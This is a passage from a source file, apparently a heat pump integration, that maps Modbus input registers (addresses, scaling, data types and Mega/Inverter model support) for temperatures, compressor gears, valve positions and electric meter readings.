{ KEY_ADDRESS: 5, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_CURRENT_DEMAND:
{ KEY_ADDRESS: 6, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DISCHARGE_PIPE_TEMPERATURE:
{ KEY_ADDRESS: 7, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_CONDENSER_IN_TEMPERATURE:
{ KEY_ADDRESS: 8, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_CONDENSER_OUT_TEMPERATURE:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BRINE_IN_TEMPERATURE:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BRINE_OUT_TEMPERATURE:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SYSTEM_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_OUTDOOR_TEMPERATURE:
{ KEY_ADDRESS: 13, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_TOP_TEMPERATURE:
{ KEY_ADDRESS: 15, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_LOWER_TEMPERATURE:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_WEIGHTED_TEMPERATURE:
{ KEY_ADDRESS: 17, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SYSTEM_SUPPLY_LINE_CALCULATED_SET_POINT:
{ KEY_ADDRESS: 18, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SELECTED_HEAT_CURVE:
{ KEY_ADDRESS: 19, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_1:
{ KEY_ADDRESS: 20, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_2:
{ KEY_ADDRESS: 21, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_3:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_4:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_5:
{ KEY_ADDRESS: 24, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_6:
{ KEY_ADDRESS: 25, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_7:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COOLING_SEASON_INTEGRAL_VALUE:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_CONDENSER_CIRCULATION_PUMP_SPEED:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_1_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BUFFER_TANK_TEMPERATURE:
{ KEY_ADDRESS: 41, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_1_POSITION:
{ KEY_ADDRESS: 43, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BRINE_CIRCULATION_PUMP_SPEED:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HGW_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_HOT_WATER_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COMPRESSOR_OPERATING_HOURS:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_OPERATING_HOURS:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_OPERATING_HOURS:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_SPEED_PERCENT:
{ KEY_ADDRESS: 54, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SECOND_PRIORITISED_DEMAND:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_THIRD_PRIORITISED_DEMAND:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SOFTWARE_VERSION_MAJOR:
{ KEY_ADDRESS: 57, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SOFTWARE_VERSION_MINOR:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SOFTWARE_VERSION_MICRO:
{ KEY_ADDRESS: 59, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_TEMPORARILY_BLOCKED:
{ KEY_ADDRESS: 60, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_CURRENT_GEAR:
{ KEY_ADDRESS: 61, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_FIRST_PRIORITY:
{ KEY_ADDRESS: 62, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_SECOND_PRIORITY:
{ KEY_ADDRESS: 63, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_THIRD_PRIORITY:
{ KEY_ADDRESS: 64, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_FOURTH_PRIORITY:
{ KEY_ADDRESS: 65, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_FIFTH_PRIORITY:
{ KEY_ADDRESS: 66, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_INTERNAL_ADDITIONAL_HEATER_CURRENT_STEP:
{ KEY_ADDRESS: 67, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_BUFFER_TANK_CHARGE_SET_POINT:
{ KEY_ADDRESS: 68, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_CURRENT:
{ KEY_ADDRESS: 69, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_CURRENT:
{ KEY_ADDRESS: 70, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_CURRENT:
{ KEY_ADDRESS: 71, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_0_VOLTAGE:
{ KEY_ADDRESS: 72, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_0_VOLTAGE:
{ KEY_ADDRESS: 73, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_0_VOLTAGE:
{ KEY_ADDRESS: 74, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_L2_VOLTAGE:
{ KEY_ADDRESS: 75, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_L3_VOLTAGE:
{ KEY_ADDRESS: 76, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_L1_VOLTAGE:
{ KEY_ADDRESS: 77, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_POWER:
{ KEY_ADDRESS: 78, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_POWER:
{ KEY_ADDRESS: 79, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_POWER:
{ KEY_ADDRESS: 80, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_METER_VALUE:
{ KEY_ADDRESS: 81, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_COMFORT_MODE:
{ KEY_ADDRESS: 82, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_KWH_TOTAL:
{ KEY_ADDRESS: 83, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_WCS_VALVE_POSITION:
{ KEY_ADDRESS: 85, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_TWC_VALVE_POSITION:
{ KEY_ADDRESS: 86, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_2_POSITION:
{ KEY_ADDRESS: 87, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_3_POSITION:
{ KEY_ADDRESS: 88, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_4_POSITION:
{ KEY_ADDRESS: 89, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_5_POSITION:
{ KEY_ADDRESS: 90, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DEW_POINT_ROOM:
{ KEY_ADDRESS: 91, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_SUPPLY_LINE_MIX_VALVE_POSITION:
{ KEY_ADDRESS: 92, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_SURPLUS_HEAT_FAN_SPEED:
{ KEY_ADDRESS: 93, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_POOL_SUPPLY_LINE_MIX_VALVE_POSITION:
{ KEY_ADDRESS: 94, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TWC_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 95, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TWC_RETURN_TEMPERATURE:
{ KEY_ADDRESS: 96, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_WCS_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 97, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_TWC_END_TANK_TEMPERATURE:
{ KEY_ADDRESS: 98, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_2_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 99, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_3_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 100, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_4_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 101, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COOLING_CIRCUIT_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 103, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_TANK_TEMPERATURE:
{ KEY_ADDRESS: 104, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_TANK_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 105, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 106, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_MIX_VALVE_5_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 107, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_2_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 109, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_3_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 111, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_4_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 113, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_5_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 115, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SURPLUS_HEAT_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 117, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_SURPLUS_HEAT_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 118, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_POOL_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 119, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_POOL_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 120, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_ROOM_TEMPERATURE_SENSOR:
{ KEY_ADDRESS: 121, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BUBBLE_POINT:
{ KEY_ADDRESS: 122, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DEW_POINT:
{ KEY_ADDRESS: 124, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SUPERHEAT_TEMPERATURE:
{ KEY_ADDRESS: 125, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SUB_COOLING_TEMPERATURE:
{ KEY_ADDRESS: 126, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_LOW_PRESSURE_SIDE:
{ KEY_ADDRESS: 127, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HIGH_PRESSURE_SIDE:
{ KEY_ADDRESS: 128, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_LIQUID_LINE_TEMPERATURE:
{ KEY_ADDRESS: 129, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SUCTION_GAS_TEMPERATURE:
{ KEY_ADDRESS: 130, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEATING_SEASON_INTEGRAL_VALUE:
{ KEY_ADDRESS: 131, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_P_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION:
{ KEY_ADDRESS: 132, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_I_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION:
{ KEY_ADDRESS: 133, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_D_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION:
{ KEY_ADDRESS: 134, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_I_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK:
{ KEY_ADDRESS: 135, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_P_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK:
{ KEY_ADDRESS: 136, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_COOLING_OPENING_DEGREE:
{ KEY_ADDRESS: 137, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_TAP_WATER:
{ KEY_ADDRESS: 139, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_HEATING:
{ KEY_ADDRESS: 140, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_COOLING:
{ KEY_ADDRESS: 141, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_POOL:
{ KEY_ADDRESS: 142, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_GENESIS:
{ KEY_ADDRESS: 143, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_LEGACY:
{ KEY_ADDRESS: 144, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_TOTAL_DISTRIBUTED_GEARS_TO_ALL_UNITS:
{ KEY_ADDRESS: 145, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MAXIMUM_GEAR_OUT_OF_ALL_THE_CURRENTLY_REQUESTED_GEARS:
{ KEY_ADDRESS: 146, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_1:
{ KEY_ADDRESS: 147, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_2:
